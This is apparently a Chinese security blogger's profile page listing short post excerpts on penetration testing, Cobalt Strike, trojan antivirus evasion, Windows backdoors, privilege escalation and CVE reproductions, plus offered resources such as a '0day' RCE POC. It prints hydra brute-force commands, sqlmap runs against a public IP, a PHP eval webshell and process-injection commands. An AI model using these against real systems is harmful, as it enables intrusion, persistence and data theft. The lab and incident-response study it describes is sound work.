- 博客(247)
- 资源 (64)
- 收藏
- 关注
原创 python安全工具开发笔记(三)——python 多线程
进程是程序的一次执行。每个进程都有自己的地址空间、内存、数据栈及其它记录其运行轨迹的辅助数据。所有的线程运行在同一个进程当中,共享相同的运行环境。线程有开始顺序执行和结束三个部分。1、计算机的核心是CPU,它承担了所有的计算任务。它就像一座工厂,时刻在运行。2、假定工厂的电力有限,一次只能供给一个车间使用。也就是说,一个车间开工的时候,其他车间都必须停工。背后的含义就是,单个CPU一次只能运行—个任务。3、进程就好比工厂的车间,它代表CPU所能处理的单个任务。
2022-12-01 16:28:13
777
1
原创 渗透测试笔记——暴力破解、定时任务与shift粘贴键权限维持、wakuang程序(靶机系统:Windows2008)
本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆一、环境搭建靶机: Windwos Server 2008 系统靶机IP地址: 192.168.226.137攻击IP地址: 192.168.226.1二、模拟攻击2.1 扫描端口拿到目标IP首先使用nmap扫描,探测一下开放的端口nmap -sS 192.168.226.137发现目标系统的 3389 号端口开发2.2 暴力破解 Administrator 密码使用 hydra 工具爆破 Adminis
2022-11-17 13:26:54
101
2
原创 python安全工具开发笔记(二)——python Web编程
url = 'http://www.baidu.com' r = urllib . request . urlopen(url) #对百度发起一次请求 print(r . read())下载百度图片并且重命名为baidu.png放在D盘的根目录下注意:Python 3.x 以上的版本,请注意python 3.x 以上的版本 urllib 和urllib2 已经被集合到一个包里 urllib 中。
2022-09-21 16:16:41
1213
原创 python安全工具开发笔记(一)——python正则表达式
字符一般字符匹配自身abcabc.匹配任意换行符“\n”以外的字符。在DOALL模式中也能匹配换行符a.cabc\转义字符,是最后一个字符改变原来的意思。如果字符串中有字符 * 需要匹配,可以使用\*或者字符集[*]a\.ca\\ca.ca\c[...]字符集(字符类)。对应的位置可以是字符集中任意字符。字符集中的字符可以逐个列出,也可以给出范围,如[abc]或[a-c],第一个字符如果是^则表示取反,如[^abc]表示不是abc的其它字符。
2022-09-20 16:32:47
508
原创 JS 逆向之 Hook
Hook 中文译为钩子,Hook 实际上是 Windows 中提供的一种用以替换 DOS 下“中断”的系统机制,Hook 的概念在 Windows 桌面软件开发很常见,特别是各种事件触发的机制,在对特定的系统事件进行 Hook 后,一旦发生已 Hook 事件,对该事件进行 Hook 的程序就会收到系统的通知,这时程序就能在第一时间对该事件做出响应。
2022-09-18 14:15:16
1255
2
原创 Cobalt Strike 的 Beacon 使用介绍以及 Profile 文件修改Beacon内存教程
1、内存段是rwx权限2、内存中有 beacon 字符串3、内存中有 ReflectiveLoader 字符串。
2022-08-23 20:36:01
1391
原创 Cobalt Strike 的 Profile 文件解析
本文主要简单介绍Cobalt Strike 的 Profile 文件各项配置的作用各种 Profile 文件 下载地址:https://github.com/xx0hcd/Malleable-C2-Profiles1、关于参数与值:profile 文件将参数括在双引号中,而不是单引号中。例如:2、一些特殊字符不需要转义例如:3、值可以使用分号例如:4、值中的双引号需要转义例如:5、双斜杠表示单斜杠例如:6、编译后的 .http-post.client 必须小于252个字节。设置配置文件
2022-08-08 19:59:13
771
原创 Cobalt Strike-修改默认证书、混淆流量-教程
首先,生成exe文件并上线使用whireshark抓取数据包查看一下默认配置下的Cobalt Strike,如下图所示默认情况下会间隔一段时间,请求一次 http://192.168.32.131//7VFJ文件、http://192.168.32.131//j.ad文件查看完整的http流,请求的http://192.168.32.131/7Vfj文件内容,请求http://192.168.32.131/j.ad文件内容。.........
2022-08-04 16:20:23
2016
5
原创 CobaltStrike-4.4-K8修改版安装使用教程
https://github.com/k8gege/Aggressor/releases/tag/cs下载之后,压缩包解压密码是:k8gege.org解压之后,如下图所示开启服务端开启客户端,默认端口是:4488,输入账号:administrator,密码:111,进行连接需要将解压缩之后的“cobaltstrike.store”文件删除,不然报错开启服务端开启客户端,默认端口是:4488,输入账号:root,密码:123,进行连接......
2022-07-04 22:39:05
3370
3
原创 绕过杀软(二)——免杀exe文件(360、火绒免杀)
攻击机: win7 IP: 192.168.32.134靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马输入回连端口号8888,点击start配置客户端木马的回连地址:192.168.32.134将文件保存在桌面开启360杀毒,直接报毒,不免杀1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开打开之后,将base6
2022-06-12 21:54:28
7626
6
原创 绕过杀软(一)—— PowerShell 进程隐藏与 NetCat进行联动
前提: 通过某些技术手段已 geshell攻击机: 192.168.32.1(win 10)、192.168.32.133(kali)靶机: 192.168.32.1(win10 WEB网站phpstudy 安装杀软360、电脑管家)因为上线cs、nc联动的命令或者脚本需要使用到 poweshell因为安装了360和火绒的服务器。在执行exe文件的时候杀毒软件会阻止exe运行如下图执行wxiaoge.exe文件都被360阻止执行 poweshell 命令会调用到powershell.exe文件也被
2022-06-11 22:24:10
971
1
原创 常见php后门分析
一、第一种<?phpdefine('test', 1); #定义一个常量 test,并且值为1$test = $_POST[test];#因为前面定义了常量 test且值为1,而此处用了常量test:“$_POST[test]”,所以post传输数据必须为1,否则与前面定义的常量不一致,导致报错if(test == 1){ @eval($test);#一句话木马后门}连接方式二、第二种...
2022-05-31 19:55:36
401
原创 python利用 pandas 库处理 json 文件数据
json数据格式import jsonimport pandas as pd df = pd.read_json("./douban.json", lines=True, encoding="utf-8")#lines是按行读取的意思df.to_excel("./douban.xlsx")print("over.....")[{"ttery":"[123]","issue":"20130801-3391"},{"ttery":"[123]","issue":"20130801-3390"
2022-05-16 17:59:25
1802
原创 IDEA 2020版 创建WEB网站+Servlet——教程
一、创建java web并访问1、打开IDEA,选择菜单 文件-》New->Project2、选择java以及自己的JDK,然后点击下一步3、点击下一步4、填写项目名称,最后点击 完成二、创建Servlet并访问com.ceshi.servlet没有Servlet的解决办法...
2022-05-03 20:44:23
1479
原创 IDEA 2020版 创建第一个WEB网站——教程
第一步:创建一个普通的java项目1、打开IDEA,选择菜单 文件-》New->Project2、选择java以及自己的JDK,然后点击下一步3、点击下一步4、填写项目名称,最后点击 完成第二步:创建WEB项目1、项目名右键,点击 添加框架的支持2、勾选Web Application,然后点击 确定第三步:配置Tomcat...
2022-05-03 17:15:36
6526
5
原创 一次真实的应急响应案例(Windows2008)——暴力破解、留隐藏账户后门与shift粘贴键后门、植入WaKuang程序——事件复现(含靶场环境)
一、事件背景某天客户反馈:服务器疑似被入侵,与恶意IP进行通信(恶意IP用192.168.226.131代替)。(真实案例自己搭建环境复现一下,靶场环境放在了 知识星球 和 我的资源 中)受害服务器: Centos系统、IP: 192.168.226.132、无WEB服务二、应急响应过程2.1 排查网络连接2.2 排查历史命令2.3 排查后门账户2.4 排查crontab后门2.5 排查是否有命令被替换三、应急响应溯源3.1 查看后门3.2 排查安全日志3.2 溯源总结至此,应急响
2022-04-02 16:25:21
8484
原创 渗透测试模拟实战——暴力破解、留后门隐藏账户与shift粘贴键后门、植入WaKuang程序(靶机系统:Windows2008)
本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆一、环境搭建靶机: Windwos Server 2008 系统靶机IP地址: 192.168.226.137攻击IP地址: 192.168.226.1二、模拟攻击2.1 扫描端口拿到目标IP首先使用nmap扫描,探测一下开放的端口nmap -sS 192.168.226.137发现目标系统的 3389 号端口开发2.2 暴力破解 Administrator 密码使用 hydra 工具爆破 Adminis
2022-03-23 14:45:55
7141
1
原创 Windows留后门--教程(五)——shift粘贴键后门
一、shift粘贴键后门介绍Shift粘滞键是当用户连按5次shift就会自动弹出的一个程序,其实不光是粘滞键,还有各种辅助功能,这类辅助功能都拥有一个特点就是当用户未进行登录时也可以触发。所以攻击者很有可能通过篡改这些辅助功能的指向程序来达到权限维持的目的。(辅助功能镜像劫持是一样的原理)二、shift粘贴键后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限靶机: windows Server2012IP: 192.168.2
2022-03-16 13:39:39
2516
1
原创 Windows留后门--教程(四)——Windows启动项后门
一、Windows启动项后门介绍Windows启动项后门也是攻击者常用的权限维持方式,大体上可以分为两种。一种是重启电脑时自启动后门程序实现权限维持;另一种是点击某应用、服务、程序时自启动后门程序实现权限维持。二、Windows启动项后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限靶机: windows Server2012IP: 192.168.226.128攻击机: kaliIP: 192.168.226.1312.1
2022-03-16 13:18:08
5041
原创 Windows留后门--教程(三)——Windows服务后门
一、Windows服务后门介绍在Windows系统中还有一个重要的机制,就是服务。通常大部分的服务都拥有SYSTEM权限,如果攻击者利用Windows的服务机制创建一个后门服务,那么这个后门将比一般的持久化方法更为强健。二、Windows服务后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限靶机: windows Server2012IP: 192.168.226.128攻击机: kaliIP: 192.168.226.131
2022-03-16 10:11:37
5456
原创 Windows留后门--教程(二)——Windows计划任务后门
一、Windows计划任务后门介绍计划任务是经常被攻击者拿来利用的控制点,计划任务可以让目标主机在特定的时间执行我们预先准备的后门程序从而帮助我们进行权限维持。二、Windows计划任务后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限环境: windows Server2012 IP: 192.168.226.1282.1 利用MSF生成一个EXE类型的后门木马2.2 创建计划任务2.3 监听返回的shell三、Win
2022-03-15 16:09:02
3611
1
原创 Windows留后门--教程(一)——Windows系统隐藏账户
一、Windows系统隐藏账户介绍系统隐藏账户是一种最为简单有效的权限维持方式,其做法就是让攻击者创建一个新的具有管理员权限的隐藏账户,因为是隐藏账户,所以防守方是无法通过控制面板或命令行看到这个账户的。二、Windows系统添加隐藏账户-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限环境: windows Server2012 IP: 192.168.226.1282.1 第一种情况:攻击者控制某台机器,并执行添加用户指令n
2022-03-14 17:06:53
12607
5
原创 一次真实的应急响应案例(Centos)——暴力破解、替换ps命令、留多个后门——事件复现(含靶场环境)
一、事件背景某天客户反馈:服务器疑似被入侵,一直反弹shell到恶意IP(恶意IP用192.168.226.131代替)。(真实案例自己搭建环境复现一下,靶场环境放在了 知识星球 和 我的资源 中)受害服务器: Centos系统、IP: 192.168.184.142、无WEB服务二、应急响应过程2.1 排查异常并清除病毒2.1.1 使用命令 alias 查看是否异常别名...
2022-03-10 14:58:54
3539
2
原创 一次真实的应急响应案例(Ubuntu)——暴力破解、写入ssh公钥留后门、植入GPU挖矿程序——事件复现(含靶场环境)
一、SSH协议介绍SSH(Secure Shell)是一套协议标准,可以用来实现两台机器之间的安全登录以及安全的数据传送,其保证数据安全的原理是非对称加密。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议,主要用于给远程登录会话数据进行加密,保证数据传输的安全。危害:SSH口令长度太短或者复杂度不够,如仅包含数字,或仅包含字母等,容易被攻击者破解,一旦被攻击者获取,可用来直接登录系统,控制服务器所有权限。一、事件背景某天客户反馈:Linux服务器有异常连接,疑似被入侵。(真实案
2022-03-01 10:48:07
4848
10
原创 渗透测试笔记——暴力破解、ssh公钥权限维持、GPU Wakuang程序(靶机系统:ubuntu)
本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆
2022-02-17 16:30:50
1351
1
原创 渗透测试模拟实战——暴力破解、替换ps命令、留多个后门
本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆一、环境搭建Centos8系统 IP地址: 192.168.184.142二、模拟攻击2.1 扫描端口拿到目标IP首先使用nmap扫描,探测一下开放的端口nmap -sS 192.168.226.132发现目标系统的22号端口开发2.2 暴力破解root密码使用 hydra 工具爆破 ssh 登录密码hydra.exe -l root -P pass.txt ssh://192.168.226.132#-l
2022-01-14 14:49:32
3651
原创 windows权限提升——烂土豆+dll劫持+引号路径&+服务权限
一、win2012—烂土豆配合令牌窃取提权—web权限1.1 RottenPotato(烂土豆)提权的原理1.欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。2.对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的。3.模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个
2021-12-06 12:26:44
3791
原创 windows权限提升——windows2003进程注入提升(本地)
一、进程注入简介进程注入提权是本地提权方式的一种较为老的安全技术了,利用的是注入进程的所有者实现权限共享机制,这类技术主要利用在Windows2008之前操作系统上。所以我们需要学习后续的本地提权更多的手法才能针对高版本的系统。版本: Windows2008之前1.1 提权教程演示环境:windows20031、将pinjector工具上传到目标服务器,运行以下命令pinjector.exe //运行命令,查看用法pinjector.exe -l //列出可注入的进程pin
2021-12-03 11:28:21
3759
原创 windows权限提升——windows2008&7 令牌窃取提升(本地)
一、令牌窃取提升介绍原理: 进行远程过程调用时请求提升权限,然后调用它从而生成特权安全令牌以执行特权操作。当系统允许令牌不仅用于进程本身,还用于原始请求进程时,漏洞就会出现。令牌窃取方式在Windows2008之后的高版本操作系统已经没用了,只能用于一些低版本系统。比如:Microsoft Windows XP Professional SP3和之前版本Windows Server 2003 SP2和之前的版本Windows Server 2003 x64和x64 SP2Windows Serv
2021-12-01 17:08:57
3990
原创 SqlMap——Oracle注入教程
一、漏洞复现靶场注入点: http://59.63.200.79:8808/?id=11、使用sqlmap检测是否存在注入点python sqlmap.py -u "http://59.63.200.79:8808/?id=1" --random-agent检测发现存在注入点,注入点在参数id的位置,数据库为Oracle数据库2、查看Oracle中全部的数据库python sqlmap.py -u "http://59.63.200.79:8808/?id=1" --random-agen
2021-12-01 11:07:10
2532
原创 windows权限提升——AT、SC、PS命令提权
一、AT命令适用范围: Windows2000、Windows 2003、Windows XP1.1 AT命令简介AT命令是Windows XP中内置的命令,它也可以媲美Windows中的“计划任务”,而且在计划的安排、任务的管理、工作事务的处理方面,AT命令具有更强大更神通的功能。AT命令可在指定时间和日期、在指定计算机上运行命令和程序。因为AT命令默认是以system权限下运行的所以我们可以利用以下命令,进行提权。1.2 AT命令提权实验系统:windows2003命令:at 13:38
2021-11-25 14:22:46
4638
2
原创 Metabase 信息泄露漏洞(CVE-2021-41277)——漏洞复现
一、漏洞简介metabase 是一个简单、开源的数据分析平台。CVE-2021-41277在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。该漏洞CVSS评分:9.9,危害等级:严重二、影响版本影响版本:metabase version < 0.40.5metabase version >= 1.0.0, < 1
2021-11-24 10:50:50
2190
原创 应用服务器GlassFish 任意文件读取——漏洞复现
一、漏洞介绍glassfish是一款java编写的跨平台的开源的应用服务器。java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.(点)利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。(所以 glassfish 这个 poc 实际上就是…/…/…/…/…/…/…/…/…/…/…/etc/passwd)二、影响版本< 4.1.1三、漏洞复现1、fofa上搜索 "GlassFish" &
2021-11-24 10:32:04
1711
原创 Web Service渗透测试——介绍+实例演示
一、API 接口介绍1.1 RPC(远程过程调用)远程过程调用(英语:Remote Procedure Call,缩写为 RPC)是一个计算机通信协议。该协议允许运行于一台计算机的程序调用另一台计算机的子程序,而程序员无需额外地为这个交互作用编程。如果涉及的软件采用面向对象编程,那么远程过程调用亦可称作远程调用或远程方法调用,例:Java RMI。RPC 一般直接使用 TCP 协议进行通信,通常不涉及到 HTTP。HTTP 下面有2种技术: XML-RPC JSON-RPCWeb se
2021-11-23 11:14:00
851
原创 渗透测试——常见服务端口及对应的漏洞汇总
一、web服务类tomcat--80/8080/8009 manager弱口令(漏洞利用可以上传war包getshell) put上传webshell HTTP慢速攻击 ajr文件包含漏洞-CVE-2020-1938 Jboss--8080 后台弱口令 console后台部署war包 JAVA反序列化 远程代码执行 webSphere--9080
2021-11-17 14:49:18
3401
2
原创 ActiveMQ 任意文件写入漏洞 getshell (CVE-2016-3088)——漏洞复现
一、ActiveMQ 漏洞介绍1.1、ActiveMQ 简介ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现
2021-11-11 17:00:14
3518
原创 ActiveMQ反序列化漏洞 getshell(CVE-2015-5254)——漏洞复现
一、ActiveMQ介绍1.1 简介Apache的一款JAVA开源消息中间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。(消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等)1.2 漏洞影响版本Apache ActiveMQ < 5.13.0 之前 5.x版本1.3 漏洞成因漏洞没有限制在代理中序列化的类,远程攻击者可以借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。1.
2021-11-10 11:11:58
3214
3
原创 EHole 指纹探测工具——使用教程
一、EHole介绍最近 EHole 更新了3.0版本,提供了 finger 与 fofaext 参数,fofaext参数主要从fofa进行批量获取 IP 的端口情况,而 finger 则进行批量进行指纹验证识别。目前开源的指纹将近1000条,基本上都是比较常遇到的系统,另外 finger 参数则可以直接识别下面格式的地址:IP:PORTHTTP(s)://URLHTTP(s)://IPHTTP(s)://IP:PORT二、使用教程在红队场景下首先对多个目标进行了资产收集,如同时几千上万个I
2021-11-09 18:15:08
8437
9
原创 Rsync未授权访问 getshell——漏洞复现
一、 Rsync未授权访问漏洞介绍rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。二、靶场搭建靶机: ubuntuIP: 192.168.241.142攻击机: kaliIP: 192.168.241.128直接使用 vluhub 环境了cd rsync/commondocker-compose builddocke
2021-11-09 17:36:13
2781
一次真实的应急响应案例(Windows2008)—暴力破解、留隐藏账户与shift粘贴键后门、植入WK程序-应急响应靶场
2022-04-06
渗透测试模拟实战——暴力破解、留定时任务后门与shift粘贴键后门、植入WaKuang程序(对应靶场和wakuang样本)
2022-03-24
一次真实的应急响应案例(Centos)——暴力破解、替换ps命令、留多个后门对应的应急响应靶场
2022-03-10
一次真实的应急响应案例(Ubuntu)——暴力破解、写入ssh公钥留hou门、植入GPU WK程序——事件复现(靶场下载地址)
2022-03-02
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu)
2022-02-18
PHP+MYSQL-图书管理系统(前端+后端全套源码)
2021-08-04
PHP+MYSQL—食品购物管理系统(前端+后端全套源码)
2021-08-04
PHP+Mysql—留言管理系统(前端+后端、整套源码).zip
2021-08-04
PHP+Mysql—博客管理系统(前端+后端)整套源码
2021-08-04
PHP+Mysql—仓储管理系统网站(前端+后端)-源码.zip
2021-06-15
PHP+Mysql—学生信息管理系统网站(前端+后端)-源码.zip
2021-06-13
PHP—图书馆管理系统网站开发-源码.zip
2021-05-13
PHP漏洞挖掘(十):PHP高级开发技术——课程资源百度网盘下载.txt
2021-05-06
PHP漏洞挖掘(九):PHP网站代码审计实战——课程资源百度网盘下载.txt
2021-05-06
PHP漏洞挖掘(八):PHP框架漏洞分析详解——课程资源百度网盘下载.txt
2021-05-06
PHP漏洞挖掘(七):PHP框架开发详解——课程资源百度网盘下载.txt
2021-05-06
PHP漏洞挖掘(六):PHP常见CMS的漏洞分析——课程资源百度网盘下载.txt
2021-05-06
PHP漏洞挖掘(五):PHP的CMS二次开发——课程资源百度网盘下载.txt
2021-05-06
PHP漏洞挖掘(四):PHP漏洞靶场实战分析——课程资源百度网盘下载.txt
2021-05-06
PHP漏洞挖掘(三):PHP工具开发实战——课程资源百度网盘下载.txt
2021-05-06
PHP漏洞挖掘(二):PHP常见漏洞分析——课程资源百度网盘下载.txt
2021-05-06
PHP漏洞挖掘(一):PHP基础知识讲解——课程资源百度网盘下载.txt
2021-05-06
应急响应实践课程(全新升级)—课程资源与下载地址.docx
2021-04-22
Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址.txt
2021-04-21
渗透测试模拟实战(含靶场环境)——暴力破解、留crontab隐藏后men-shell文件与靶场下载地址(1).txt
2021-04-21
Thinkphp全网GUI EXP 2020 HackingClub 线下典藏版
2021-04-13
亿邮电子邮件系统的前台RCE漏洞的POC(0day-2021-04-09).docx
2021-04-10
(华科企业网站管理系统)hkqyglxt-含有存储型XSS漏洞的源码包.rar
2021-03-24
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人